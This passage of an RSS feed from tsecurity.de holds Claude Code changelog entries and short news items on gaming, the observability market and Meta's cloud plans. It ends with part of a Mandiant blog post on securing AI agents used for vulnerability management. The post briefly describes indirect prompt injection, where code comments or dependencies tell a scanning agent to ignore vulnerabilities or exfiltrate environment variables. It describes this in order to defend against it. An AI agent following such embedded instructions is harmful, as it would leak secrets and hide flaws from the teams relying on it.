<li>Fixed completed background sessions being impossible to remove via <code>claude rm</code> or the agent view once the background service had gone idle</li>
<li>Fixed background sessions dispatched from a non-git folder being impossible to delete from the agents view</li>
<li>Fixed reopening a stopped background session failing to restore its saved conversation when an unreadable folder exists in the session store</li>
<li>Fixed the Remote Control "session ready" push notification firing for sessions where Remote Control was not explicitly enabled</li>
<li>Fixed <code>/install-github-app</code> and the <code>/mcp</code> settings menu being blocked in agent-view sessions — they're now refused only in background sessions with no terminal attached</li>
<li>Fixed plugins enabled via the <code>--settings</code> CLI flag not loading (regression since v2.1.181)</li>
<li>Fixed feature flags going stale in long-running sessions after the OAuth token rotates</li>
<li>Fixed <code>/ultrareview</code> refusing to run in repos with no merge base — it now offers to review all tracked files</li>
<li>Fixed <code>claude update</code> and <code>claude doctor</code> hanging silently, and the <code>/status</code> System diagnostics section going blank, when a shell-config path is a directory</li>
<li>Fixed memory frontmatter values being silently truncated at an inline <code>#</code> when memory files are saved</li>
<li>Fixed session cost and token telemetry double-counting on streams that emit multiple cumulative <code>message_delta</code> frames</li>
<li>Fixed a spurious "check your network" warning that appeared while the advisor was thinking</li>
<li>Fixed hooks with exit code 2 not blocking as documented when the hook's stdout JSON fails schema validation</li>
<li>Fixed OTel log events emitted outside the turn's async context missing the interaction span's trace context</li>
<li>Fixed MCP transient errors during prompts/resources refresh clearing the server's slash commands and resources</li>
<li>Improved the <code>claude rc</code> workspace-trust error in the home directory to say trust there is never saved and to suggest running from a project directory</li>
<li>Changed single-segment <code>dir/**</code> hook <code>if:</code> conditions to match only <code>&lt;cwd&gt;/dir</code>; write <code>**/dir/**</code> for any-depth matching. <code>deny</code>/<code>ask</code> permission rules keep their any-depth match.</li>
<li>Changed <code>file</code> commands using <code>-m</code>/<code>--magic-file</code> or <code>-f</code>/<code>--files-from</code> to require permission instead of being auto-allowed as read-only</li>
<li>Changed keep-alive connection pooling to disable after a stale-connection error, so retries open a fresh socket</li>
<li>Changed SessionStart hooks to report source <code>"fork"</code> when a session begins as a fork instead of <code>"resume"</code></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Seattle indie hit ‘Stardew Valley’ is coming to ‘Magic: The Gathering’]]></title>
<description><![CDATA[Stardew Valley, the blockbuster farming sim from solo Seattle developer Eric "ConcernedApe" Barone, is coming to Magic: The Gathering via a three-part Secret Lair drop from Renton-based Wizards of the Coast — with original pixel art from Barone himself. Read More]]></description>
<link>https://tsecurity.de/de/3676921/it-nachrichten/seattle-indie-hit-stardew-valley-is-coming-to-magic-the-gathering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676921/it-nachrichten/seattle-indie-hit-stardew-valley-is-coming-to-magic-the-gathering/</guid>
<pubDate>Fri, 17 Jul 2026 21:47:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img fetchpriority="high" loading="eager" width="1260" height="560" src="https://cdn.geekwire.com/wp-content/uploads/2026/07/stardew-magic-1260x560.png" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/07/stardew-magic-1260x560.png 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/07/stardew-magic-768x341.png 768w, https://cdn.geekwire.com/wp-content/uploads/2026/07/stardew-magic-1536x683.png 1536w, https://cdn.geekwire.com/wp-content/uploads/2026/07/stardew-magic.png 1881w" sizes="(max-width: 1260px) 100vw, 1260px"><br>Stardew Valley, the blockbuster farming sim from solo Seattle developer Eric "ConcernedApe" Barone, is coming to Magic: The Gathering via a three-part Secret Lair drop from Renton-based Wizards of the Coast — with original pixel art from Barone himself. <a href="https://www.geekwire.com/2026/seattle-indie-hit-stardew-valley-is-coming-to-magic-the-gathering/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI workloads shake up observability market]]></title>
<description><![CDATA[Observability platforms are evolving beyond traditional monitoring as vendors add AI capabilities and cost-management features aimed at helping enterprise organizations better manage increasingly complex IT environments.



Vendors are investing heavily in AI observability, autonomous investigati...]]></description>
<link>https://tsecurity.de/de/3676598/it-security-nachrichten/ai-workloads-shake-up-observability-market/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676598/it-security-nachrichten/ai-workloads-shake-up-observability-market/</guid>
<pubDate>Fri, 17 Jul 2026 18:28:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/972187/how-to-shop-for-network-observability-tools.html" target="_blank">Observability platforms</a> are evolving beyond traditional monitoring as vendors add AI capabilities and cost-management features aimed at helping enterprise organizations better manage increasingly complex IT environments.</p>



<p class="wp-block-paragraph">Vendors are investing heavily in AI observability, autonomous investigations, cost optimization, and operational intelligence as they try to evolve their platforms into systems that help IT teams understand problems, identify root causes, and determine the best course of action, according to Gartner, which just published its latest <a href="https://www.gartner.com/en/documents/8114397" target="_blank" rel="noreferrer noopener">Magic Quadrant for Observability Platforms</a>.</p>



<p class="wp-block-paragraph">Gartner defines the observability category as technologies that help organizations understand and optimize the health, performance, and behavior of applications, infrastructure, services, AI agents, and user experiences by collecting and analyzing telemetry data, such as logs, metrics, events, and traces.</p>



<p class="wp-block-paragraph">There are 19 vendors that made the cut for Gartner’s new report. Its Leaders quadrant includes (alphabetically) Chronosphere, Coralogix, Datadog, Dynatrace, Elastic, Grafana Labs, IBM, and New Relic. The Challengers are Alibaba Cloud, Amazon Web Services, LogicMonitor, Microsoft, and Splunk. The two Visionaries are BMC Helix and Honeycomb. Those dubbed Niche Players are Apica, HPE, ScienceLogic, and SolarWinds. (For specific vendor strengths and cautions, check out the full Gartner report. Some vendors offer free versions of the report with registration.)</p>



<p class="wp-block-paragraph">Looking beyond quadrant placement, Gartner advises organizations to evaluate vendors based on their ability to deliver full-stack observability and their “roadmap credibility” in key areas such as AI observability, OpenTelemetry interoperability, and the ability to observe and govern AI agents.</p>



<h2 class="wp-block-heading">AI observability emerges as a key differentiator</h2>



<p class="wp-block-paragraph">Organizations are increasingly looking for visibility into AI workloads, including token consumption, model latency, response quality, hallucination rates, and other AI-specific performance metrics, according to the report. Gartner identifies <a href="https://www.networkworld.com/article/4047640/ai-networking-success-requires-deep-real-time-observability.html" target="_blank">AI observability</a> as an emerging requirement, driven by growing enterprise interest in large language models (LLMs), genAI applications, and agentic AI systems.</p>



<p class="wp-block-paragraph">The report recognizes a growing number of vendors introducing AI-focused monitoring, autonomous investigations, AI agents, and specialized observability capabilities designed to help organizations monitor and govern AI-powered applications and workflows. At the same time, Gartner clarifies that many claims surrounding autonomous operations remain ahead of reality. </p>



<p class="wp-block-paragraph">“The transition from generative AI assistants to autonomous agents is more complex than vendor marketing suggests,” the report states.</p>



<h2 class="wp-block-heading">Cost management becomes a top priority</h2>



<p class="wp-block-paragraph">While AI may dominate vendor messaging, Gartner states that telemetry cost management remains one of the top concerns for enterprise buyers.</p>



<p class="wp-block-paragraph">As organizations collect larger amounts of logs, traces, metrics, and events, observability spending is increasingly attracting attention from finance and procurement teams. Gartner notes that 5% of its clients now spend more than $10 million annually with a single observability provider.</p>



<p class="wp-block-paragraph">Gartner describes pipeline management as a strategic layer that is becoming central to observability deployments. Vendors that fail to address these cost concerns risk losing customers to vendor-agnostic alternatives focused on telemetry optimization. Organizations increasingly want platforms that can provide cost attribution, utilization insights, and financial metrics that help justify observability investments, according to Gartner.</p>



<p class="wp-block-paragraph">Gartner projects the observability market will reach $14.3 billion by 2028, driven increasingly by organizations’ need to manage growing telemetry volumes.</p>



<h2 class="wp-block-heading">OpenTelemetry is table stakes as consolidation continues</h2>



<p class="wp-block-paragraph">The growing impact of open standards is a major shift for observability, Gartner notes.</p>



<p class="wp-block-paragraph">The widespread adoption of <a href="https://www.networkworld.com/article/3621642/5-reasons-why-2025-will-be-the-year-of-opentelemetry.html" target="_blank">OpenTelemetry</a> and eBPF-based instrumentation has lowered barriers to switching observability providers and made telemetry collection increasingly commoditized, the research firm explains. Gartner says many enterprise buyers now consider OpenTelemetry support a baseline requirement rather than a differentiator.</p>



<p class="wp-block-paragraph">As a result, vendors are now trying to differentiate themselves through analytics, automation, AI capabilities, and user experience rather than proprietary data collection approaches. That shift is forcing vendors to demonstrate value beyond monitoring and visibility, as buyers seek platforms capable of accelerating troubleshooting, automating investigations, and improving operational outcomes, according to Gartner.</p>



<p class="wp-block-paragraph">Gartner says market consolidation continues to favor platform-oriented vendors that combine full-stack observability with integrated AI capabilities. Organizations are increasingly looking for unified platforms that can monitor applications, infrastructure, digital experiences, and AI workloads from a single environment.</p>



<h2 class="wp-block-heading">The rise of operational intelligence</h2>



<p class="wp-block-paragraph">As enterprises modernize applications and expand AI initiatives, organizations want platforms that can not only identify problems but also explain causes, prioritize actions, and potentially automate remediation. Vendors are expanding observability platforms with AI-driven analytics, automation, and governance capabilities that span applications, infrastructure, cloud services, and AI workloads.</p>



<p class="wp-block-paragraph">For enterprise buyers, the next phase of observability may be defined less by telemetry collection and more by how effectively vendors can transform data into intelligence, automation, and measurable business outcomes.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can Meta really compete in the cloud business?]]></title>
<description><![CDATA[Meta is reportedly planning a cloud business that would sell access to AI computing power and models, extending its internal infrastructure into a commercial service for outside developers and enterprises. Reuters, citing Bloomberg’s reporting, noted that the planned offering would allow customer...]]></description>
<link>https://tsecurity.de/de/3675548/ai-nachrichten/can-meta-really-compete-in-the-cloud-business/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675548/ai-nachrichten/can-meta-really-compete-in-the-cloud-business/</guid>
<pubDate>Fri, 17 Jul 2026 11:04:14 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.bloomberg.com/news/articles/2026-07-01/meta-is-building-a-cloud-business-to-sell-excess-ai-compute">Meta is reportedly planning a cloud business</a> that would sell access to AI computing power and models, extending its internal infrastructure into a commercial service for outside developers and enterprises. Reuters, citing Bloomberg’s reporting, noted that the planned offering would allow customers to access AI models hosted on Meta’s infrastructure and pay based on usage, effectively positioning the company in the <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">infrastructure-as-a-service</a> and AI platform markets. On the surface, this seems like a logical next step. If you are already spending enormous amounts of money to build AI infrastructure, there is a natural temptation to ask whether some of that investment can be monetized beyond your own internal use.</p>



<p class="wp-block-paragraph">I have seen this pattern before. A company builds sophisticated internal systems, recognizes their value, and then begins to imagine that becoming a cloud provider is simply a matter of exposing those capabilities to external customers. It sounds straightforward, especially given the excitement around AI and the demand for high-performance infrastructure. But cloud computing is not just another distribution model. It is not simply a matter of offering on-demand multitenant services and charging a fee. It is a deeply operational, trust-based business in a market that punishes companies that do not fully understand what enterprise customers require.</p>



<h2 class="wp-block-heading">A crowded neocloud market</h2>



<p class="wp-block-paragraph">The first problem Meta faces is that this is not an open opportunity. The <a href="https://www.infoworld.com/article/4140865/neoclouds-run-ai-cheaper-and-better.html">neocloud</a> space, meaning purpose-built AI infrastructure delivered as a service, is already crowded and increasingly difficult to enter. Amazon, Microsoft, and Google dominate the conversation for obvious reasons. They have years of cloud operating experience, broad service portfolios, global reach, mature ecosystems, and deeply established enterprise relationships. Oracle remains a serious player as well, especially in enterprise applications, data platforms, and performance-sensitive workloads. IBM still matters in <a href="https://www.networkworld.com/article/964498/what-is-hybrid-cloud-computing.html">hybrid cloud</a>, operations, and industries where governance and regulatory rigor remain central.</p>



<p class="wp-block-paragraph">That list alone should give Meta pause. These companies are not just infrastructure vendors. They are experienced cloud operators. They have spent years building not only the underlying platforms, but also the native capabilities enterprises now expect by default. Those capabilities include security, governance, identity management, observability, support, compliance, billing controls, resilience planning, and integration with the broader enterprise technology estate. These are not secondary features. They are part of the core value proposition.</p>



<p class="wp-block-paragraph">This is why late entry into the cloud market is so hard. A new provider is not just competing on price or capacity. It is competing against accumulated trust. Enterprises are not casual buyers. They are selecting long-term operating environments for applications, data, AI models, and business-critical processes. They want confidence that the provider understands how these services will be consumed, governed, and supported over time. Meta is entering a market where the incumbents already have a major head start on all of those fronts.</p>



<h2 class="wp-block-heading">Harder than it looks</h2>



<p class="wp-block-paragraph">Over the years, I have had many technology companies come to me and say they wanted to reposition their technology in the cloud space, either as <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">software as a service</a> or infrastructure as a service. In the beginning, enthusiasm is always high. The technology is impressive. The market size looks attractive. The revenue models appear compelling. Investors love the story. Then we begin to walk through what it really means to operate as a cloud provider, and the optimism usually fades fast.</p>



<p class="wp-block-paragraph">The questions become very practical and very uncomfortable. How will tenants be isolated? How will <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">identity and access controls</a> work across different kinds of customers? What governance models will be built in natively? How will workloads be monitored, optimized, and secured? What does support look like 24 hours a day, across regions, across industries, across compliance boundaries? How will outages be handled, communicated, and remediated? How will the platform integrate with existing customer tools for operations, policy management, and security response? How much investment will it take just to become credible before you even begin to differentiate?</p>



<p class="wp-block-paragraph">Once companies fully understand the complexities, market dynamics, and the capital and execution required to compete even with secondary players, many of them back off. They realize that cloud technology is not a packaging exercise. It is a transformation in how a company designs, operates, supports, sells, and evolves technology. That is why I remain skeptical when any company assumes it can translate internal infrastructure excellence into external cloud success without a very long, disciplined commitment.</p>



<h2 class="wp-block-heading">Meta’s market readiness</h2>



<p class="wp-block-paragraph">Of course, Meta is not lacking in financial resources. If any company can afford to spend aggressively in this space, it is Meta. The company has the capital to build infrastructure, absorb losses, hire experienced talent, and stay in the market long enough to make a serious attempt. I would never argue that Meta is too small or too poor to try. Quite the opposite. If there is any non-traditional entrant with the financial scale to force itself into the conversation, Meta would be high on the list.</p>



<p class="wp-block-paragraph">But money does not erase complexity. It only gives you the chance to confront it. The real question is not whether Meta can afford to become a cloud provider. The question is whether Meta has what it takes to become an <em>excellent </em>cloud provider. Those are two very different things. Enterprises are not going to move meaningful workloads to a new platform simply because the company behind it is wealthy or technically famous. They are going to ask whether the provider understands enterprise consumption patterns, enterprise risk, enterprise governance, and enterprise operations.</p>



<p class="wp-block-paragraph">That is where the challenge becomes much more serious. Meta has extensive experience running infrastructure for itself. That is valuable, but internal operating excellence is not the same thing as external service maturity. Running systems for your own workloads allows a high degree of control over architecture, standards, priorities, and operating assumptions. Running systems for paying customers requires flexibility, consistency, transparency, and support across a wide range of use cases that you do not control. Those are very different disciplines, and companies often underestimate the gap between them.</p>



<h2 class="wp-block-heading">What exactly is Meta?</h2>



<p class="wp-block-paragraph">Another concern here is strategic clarity. Meta already has a complicated market identity. It is a social media company, an advertising platform company, a hardware company, an AI company, and still, in the minds of many, the company that spent billions pursuing the metaverse. If it now wants to be viewed as a serious cloud infrastructure provider, it will need to explain not only what it is offering, but why customers should believe this is a durable long-term commitment and not just another adjacent experiment.</p>



<p class="wp-block-paragraph">That uncertainty can be damaging. Customers want stable providers with clear strategic intent. They do not want to architect important systems around a platform if they suspect the provider may lose interest, shift direction, or reframe the business after a few years of uneven results. Cloud computing requires patience, consistency, and deep customer orientation. It is not a market where strategic ambiguity helps.</p>



<p class="wp-block-paragraph">This could become confusing for Meta internally as well. Building a true cloud business demands focus. It demands years of investment in areas that may not be glamorous but are absolutely necessary, such as governance, operations, controls, support frameworks, partner programs, and enterprise sales alignment. If the company is not willing to make those sacrifices fully and for the long term, the initiative will struggle.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Demystifying AI Exploits: A Blueprint for AI-Assisted Vulnerability Management]]></title>
<description><![CDATA[Written by: Jules Czarniak

Introduction 
As highlighted in the Mandiant M-Trends 2026 report, the mean time-to-exploit (TTE) has dropped to -7 days, meaning vulnerabilities are often exploited a week before a patch even exists. 
To keep pace, many security teams are exploring how to integrate la...]]></description>
<link>https://tsecurity.de/de/3673775/it-security-nachrichten/demystifying-ai-exploits-a-blueprint-for-ai-assisted-vulnerability-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673775/it-security-nachrichten/demystifying-ai-exploits-a-blueprint-for-ai-assisted-vulnerability-management/</guid>
<pubDate>Thu, 16 Jul 2026 16:23:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Jules Czarniak</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction </span></h3>
<p><span>As highlighted in the </span><a href="https://cloud.google.com/security/resources/m-trends"><span>Mandiant M-Trends 2026 report</span></a><span>, the mean time-to-exploit (TTE) has dropped to -7 days, meaning vulnerabilities are often exploited a week before a patch even exists. </span></p>
<p><span>To keep pace, many security teams are exploring how to integrate large language model (LLM) agents into their codebases, development environments and continuous integration and continuous delivery (CI/CD) pipelines for automated vulnerability discovery and remediation. However, deploying privileged artificial intelligence (AI) agents without mature integration processes introduces new architectural risks. </span></p>
<p><span>In response to customer inquiries about how to safely integrate AI capabilities into vulnerability management workflows, this blog provides actionable guidance from Mandiant Consulting about how to establish operational guardrails for AI assisted vulnerability management, including several detailed scenarios. What each of these examples show is that security teams can accelerate workflows with AI while also upholding the structural integrity of their environments. We suggest that combining AI capabilities with deterministic controls and human intelligence in strategic ways maximizes benefits and reduces risk. </span></p>
<h3><span>Establish Operational Guardrails to Safely Deploy AI Agents</span></h3>
<p><span>To safely adopt advanced AI capabilities without introducing unpredictable failures into deployment pipelines, organizations should ground their approach in established industry standards. While guidelines like the </span><a href="https://www.nist.gov/itl/ai-risk-management-framework" rel="noopener" target="_blank"><span>NIST AI Risk Management Framework (RMF)</span></a><span> and the </span><a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/" rel="noopener" target="_blank"><span>OWASP Top 10 for LLMs</span></a><span> provide comprehensive baselines for identifying risks, operationalizing these controls requires a structural blueprint.</span></p>
<p><span>Frameworks like </span><a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"><span>Google’s Secure AI Framework (SAIF)</span></a><span> </span><a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"><span>and</span></a><a href="https://storage.googleapis.com/gweb-research2023-media/pubtools/1018686.pdf" rel="noopener" target="_blank"><span> </span><span>Google’s approach to secure AI Agents</span></a><span> provide a practical path forward, demanding that organizations extend existing deterministic controls directly into the AI execution environment. When deploying AI agents, security teams should navigate specific operational and structural risks:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Pre-agent data security and Defense-in-Depth:</strong><span> Agents should not be able to access personally identifiable information (PII), protected health information (PHI), or other sensitive data. Organizations should enforce data security before the prompt reaches the model. This includes strictly using non-production environments populated with synthetic data for testing. For production, security teams should deploy a hybrid defense-in-depth model. This includes Layer 1 deterministic policy engines acting as chokepoints, alongside Layer 2 reasoning-based defenses like specialized guard models (such as </span><a href="https://docs.cloud.google.com/model-armor/overview"><span>Model Armor</span></a><span> or similar provider-agnostic guardrails) to filter out sensitive data and block malicious prompt injections before they reach the agent layer. Crucially for vulnerability discovery, security teams should treat the codebase itself as an untrusted input. Threat actors can embed indirect prompt injections within source code comments or third-party dependencies (e.g., hidden instructions telling the agent to ignore vulnerabilities or exfiltrate environment variables), making input sanitation a requirement even for internal scanning.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Cloud provider limitations and zero data retention (ZDR):</strong><span> Many cloud and LLM providers block or throttle automated offensive security probing by default to prevent abuse. Organizations should establish clear rules of engagement and authorized testing agreements to navigate acceptable use policies. Furthermore, organizations should enforce strict zero data retention (ZDR) agreements with their LLM providers to guarantee that proprietary code and discovered vulnerabilities are never used to train external models.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Workload isolation:</strong><span> Agent workloads should execute in strictly isolated, unprivileged containers with dynamically limited privileges. By relying on robust sandboxing to prevent privilege escalation, if an agent hallucinates a destructive command or is hijacked via prompt injection, the blast radius remains contained.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Red Teaming:</strong><span> Before deploying autonomous vulnerability scanners that can dynamically spin up sandboxes and execute code, organizations should subject the AI agents themselves to human-led red teaming as part of comprehensive assurance efforts. This validates the agent's resilience against jailbreaks, recursive logic loops, and complex prompt injections, ensuring the security tooling does not become the attack vector.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Least-Privileged Machine Identities and Human Controllers:</strong><span> While workloads should be isolated, agents inherently require privileges to generate pull requests and commit code. Security teams should ensure these agents operate under distinct, strictly scoped machine identities that tie back to human controllers to ensure accountability and user consent. Organizations should use short-lived, just-in-time (JIT) tokens bound exclusively to the specific repository and branch under review. T</span><span>his enforces the principle of limited agent powers and ensures that even if an agent’s container is compromised via prompt injection, the threat actor cannot pivot to modify adjacent enterprise codebases.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Supply chain resilience for skills:</strong><span> As developers augment AI with third-party skills and model context protocol (MCP) servers, security teams should treat these integrations as untrusted supply chain components. MCP plugins introduce the risk of supply chain poisoning, where a previously benign integration is silently updated with malicious dependencies. Additionally, security teams should evaluate the underlying agent orchestration frameworks themselves (e.g., LangChain, AutoGen) for inherent vulnerabilities, such as session memory poisoning or recursive loop hijacking.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Toxic flow analysis (TFA) and Observable Actions:</strong><span> The objective of TFA is to monitor data paths at runtime, ensuring agents do not exfiltrate sensitive internal context to unvetted external endpoints. Agent actions, inputs, reasoning, and outputs must be fully observable and transparently logged. While implementing dynamic taint tracking for LLMs remains a complex architectural challenge, organizations should clearly separate this runtime observability from static supply chain controls. Integrating threat intelligence to hash and vet incoming agent tools provides a necessary baseline for verifying integrity </span><span>before</span><span> deployment. However, because static controls cannot address behavior post-deployment, mitigating data exfiltration ultimately requires active runtime monitoring and secure, centralized logging to trace and restrict the actual flow of data.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image1.max-1000x1000.png" alt="Demystifying AI image1">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="u6hlz">Figure 1: Visual representation of an isolated AI agent environment using SAIF mechanisms</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>By operationalizing these tools within frameworks that demand verifiable integrity and structural resilience, organizations can safely bridge the gap between AI velocity and enterprise defense.</span></p>
<h3><span>The need for human-led threat modeling</span></h3>
<p><span>While LLMs excel at identifying syntax patterns, source code itself rarely contains the full picture of unwritten business intent. Some organizations attempt to solve this by connecting LLM agents to internal wikis, design documents, and issue trackers using retrieval-augmented generation (RAG).</span></p>
<p><span>While RAG gives the model access to external business context, it is not a perfect fix. Corporate documentation is frequently stale, contradictory, or incomplete. An AI agent might retrieve an outdated architecture diagram and confidently hallucinate a secure path that no longer exists in production. Because LLM agents struggle to resolve conflicting, undocumented human assumptions, human-led threat modeling remains a critical security control across both legacy applications and modern agent workflows.</span></p>
<p><span>Security teams should apply threat modeling during both the pre-build system design phase to establish a secure foundation, and during post-build architecture reviews. While an AI agent might successfully identify a poorly configured internal endpoint locally, a human threat modeler asks the structural question: </span><span>why does that microservice possess broad database read permissions in the first place?</span><span> </span></p>
<p><span>Identifying architectural vulnerabilities requires reasoning about business risk, data sensitivity, and operational constraints. To structure this process, organizations can use industry frameworks like PASTA (Process for Attack Simulation and Threat Analysis) or service offerings like the </span><a href="https://services.google.com/fh/files/misc/ds-threat-modeling-security-service-en.pdf" rel="noopener" target="_blank"><span>Mandiant Threat Modeling Security Service</span></a><span> to map trust boundaries, uncover structural design flaws, and prioritize compensating controls. Securing fundamental architecture through human oversight is a necessary component when relying on automated agents to find bugs in a poorly designed system.</span></p>
<p><span>Once these AI agents are safely sandboxed, as guided by SAIF, and the architecture is verified through threat modeling, organizations can typically apply them to two different problem spaces: Enterprise Vulnerability Management (to assist in managing the volume of known CVEs in commercial off-the-shelf (COTS) software and infrastructure) and Product Security (to identify vulnerabilities in 1st-party (1P) code).</span></p>
<h3><span>Track 1: Enterprise Vulnerability Management</span></h3>
<h4><span>Foundational security and discovery </span></h4>
<p><span>While the second track of this post explores how AI agents can uncover complex zero-days in custom code, organizations should manage the scale of enterprise infrastructure in tandem with these AI deployments. Even as new AI capabilities dominate headlines, organizations should still address foundational security challenges, such as secrets sprawl, unmanaged service accounts, missing FIDO2 MFA, and legacy VPN concentrators. Although vulnerability exploitation was the primary initial infection vector in intrusions Mandiant investigated last year, threat actors consistently rely on missing foundational controls and unpatched edge devices to secure and escalate their foothold after exploiting a vulnerability.</span></p>
<p><span>Furthermore, AI cannot replace foundational visibility. As security teams deploy AI agents, they should simultaneously close these tactical entry points by maximizing dynamic discovery capabilities like External Attack Surface Management (EASM), Cloud Security Posture Management (CSPM), and Continuous Threat Exposure Management (CTEM). In hybrid and cloud environments, tools like </span><a href="https://cloud.google.com/wiz?e=48754805"><span>Wiz</span></a><span> can be used to map this initial footprint.</span></p>
<h3><span>Risk-based vulnerability management </span></h3>
<p><span>Vulnerability management teams are already overwhelmed by the current volume of findings generated by traditional scanners. As organizations scale dynamic discovery tools, such as EASM, CSPM and CTEM, alongside automated AI agents, this influx of findings will compound the problem. To manage this influx, telemetry from these diverse discovery methods must first be normalized and deduplicated. This normalized data serves two purposes: it feeds directly into the risk engine, and it acts as a live overlay to correct stale records in the configuration management database (CMDB). By evaluating the deduplicated vulnerabilities alongside this newly updated asset context and frontline threat intelligence, the RBVM engine calculates a custom risk score that allows security teams to dynamically prioritize remediation.</span></p>
<p><span>A mature RBVM methodology calculates a customized risk score on a 0 to 100 scale using a weighted average. A sample formula for calculating this risk-based score is:</span></p>
<p><span>Final Score = (W_1 * S_vuln) + (W_2 * S_asset) + (W_3 * S_threat)</span></p>
<p><span>The variables and weights (W) are customized to the organization's risk appetite (for example, 0.20 for vulnerability, 0.40 for asset, and 0.40 for threat, summing to 1.0), while the underlying variables (S) are scored on a 0 to 100 scale and defined as follows:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Vulnerability severity (S_vuln): </strong><span>The inherent technical severity of the flaw. This is calculated by taking the CVSS Base Score (which natively accounts for confidentiality, integrity, and availability impact) and multiplying it by 10.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Asset context (S_asset): </strong><span>A combined metric of exposure and data sensitivity. Scores range from 100 for internet-facing assets holding customer data, down to 25 for internal-only assets with no sensitive data. To translate this impact into monetary terms for non-technical stakeholders, organizations can incorporate Factor Analysis of Information Risk (FAIR) principles into this metric. However, this approach requires highly accurate, continuously updated financial data that many enterprises struggle to maintain at scale.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Threat context (S_threat): </strong><span>The real-world urgency of the vulnerability. Scores range from 100 if actively exploited by threat actors relevant to the organization's profile, 75 if a proof-of-concept exists or if it is a vulnerability class easily exploited by autonomous AI agents, down to 25 if the exploit is theoretical and highly complex. Organizations should also map the Exploit Prediction Scoring System (EPSS) probability percentage directly into this variable. This allows the threat score to automatically scale up or down as real-world exploitation telemetry shifts, aligning static vulnerability data with active threat intelligence.</span></p>
</li>
</ul>
<p><span>An asset's customized risk score should directly influence internal remediation service-level agreements (SLAs), unless external compliance-driven mandates, such as CISA Binding Operational Directives (BODs), or relevant equivalents, override internal prioritization. A risk-driven and threat-intelligence-driven vulnerability prioritization methodology will help organizations focus resources on managing and mitigating the most critical security vulnerabilities first. This is an area where LLMs can support the vulnerability management process, particularly by helping teams synthesize unstructured threat intelligence to surface relevant risk contexts more efficiently. Enforcing strict SLOs for patching, while requiring formal risk acceptance documentation for any patching exceptions, will help reduce the number of vulnerabilities available to threat actors and increase the visibility of outstanding risks across the organization. Furthermore, organizations should integrate RBVM data directly into their security orchestration, automation, and response (SOAR) platforms for automated alert enrichment.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image5.max-1000x1000.png" alt="Demystifying AI image5">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ce5s1">Figure 2: Integration points of a risk-based vulnerability management (RBVM) program.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Containment and Observability</span></h3>
<p><span>Modern architecture blueprints must prioritize attack surface reduction under the assumption that vulnerabilities will inevitably be exploited. Moving away from traditional perimeter defenses, organizations should align with zero trust principles, ensuring that security boundaries are established around every asset, workload, and identity.</span></p>
